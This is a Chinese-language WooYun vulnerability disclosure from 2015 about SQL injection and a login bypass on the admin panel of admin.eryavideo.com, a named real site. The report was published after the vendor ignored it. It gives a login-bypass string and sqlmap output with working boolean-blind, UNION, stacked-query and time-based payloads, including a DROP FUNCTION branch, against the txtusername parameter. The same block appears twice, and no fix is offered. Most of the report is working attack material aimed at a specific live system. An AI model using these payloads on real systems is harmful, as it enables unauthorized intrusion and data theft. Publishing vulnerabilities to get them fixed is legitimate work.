当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109862

漏洞标题:尔雅某管理系统存在sql注入漏洞可秒进后台

相关厂商:erya100.com

漏洞作者: 好基友一辈子

提交时间:2015-04-26 12:26

修复时间:2015-05-01 12:28

公开时间:2015-05-01 12:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-26: 细节已通知厂商并且等待厂商处理中
2015-05-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

接着挖

详细说明:

漏洞地址:http://admin.eryavideo.com/
存在万能密码 admin' or'1'='1 可秒进后台
存在sql注入

[root@Hacker~]# Sqlmap -r c:\1.txt --
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 12:05:42
[12:05:42] [INFO] parsing HTTP request from 'c:\1.txt'
[12:05:42] [INFO] resuming back-end DBMS 'microsoft sql server'
[12:05:42] [INFO] testing connection to the target URL
[12:05:42] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtusername
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss'; IF(5916=5916) SELECT
5916 ELSE DROP FUNCTION ALJh--&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss' UNION ALL SELECT CHAR
(113)+CHAR(101)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(109)+CHAR(117)+CHAR(84)+CHAR(
110)+CHAR(70)+CHAR(72)+CHAR(97)+CHAR(75)+CHAR(69)+CHAR(90)+CHAR(113)+CHAR(109)+C
HAR(109)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss'; WAITFOR DELAY '0:0:5
'--&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss' WAITFOR DELAY '0:0:5'
--&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
---
[12:05:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[12:05:42] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[12:05:42] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\SQLMAP~1.4\SQLMAP~1.4\Bin\output\admin.eryavideo.com'
[*] shutting down at 12:05:42
[root@Hacker~]# Sqlmap


QQ图片20150423120653.png

漏洞证明:

漏洞地址:http://admin.eryavideo.com/
存在万能密码 admin' or'1'='1 可秒进后台
存在sql注入

[root@Hacker~]# Sqlmap -r c:\1.txt --
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 12:05:42
[12:05:42] [INFO] parsing HTTP request from 'c:\1.txt'
[12:05:42] [INFO] resuming back-end DBMS 'microsoft sql server'
[12:05:42] [INFO] testing connection to the target URL
[12:05:42] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtusername
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss'; IF(5916=5916) SELECT
5916 ELSE DROP FUNCTION ALJh--&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss' UNION ALL SELECT CHAR
(113)+CHAR(101)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(109)+CHAR(117)+CHAR(84)+CHAR(
110)+CHAR(70)+CHAR(72)+CHAR(97)+CHAR(75)+CHAR(69)+CHAR(90)+CHAR(113)+CHAR(109)+C
HAR(109)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss'; WAITFOR DELAY '0:0:5
'--&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGS
NyKLggGcjAYSNe8sqvKIjCqZToA==&__EVENTVALIDATION=/wEWBALOvJrEBQKl1bKdCAK1qbT2CQKM
54rGBt6uGfZ39Y6JjZgS3KJGe7Qdd38M&action=lg&txtusername=ss' WAITFOR DELAY '0:0:5'
--&txtpassword=ss&Button1=%E7%99%BB%E5%BD%95
---
[12:05:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[12:05:42] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[12:05:42] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\SQLMAP~1.4\SQLMAP~1.4\Bin\output\admin.eryavideo.com'
[*] shutting down at 12:05:42
[root@Hacker~]# Sqlmap


QQ图片20150423120653.png

修复方案:

版权声明:转载请注明来源 好基友一辈子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-01 12:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无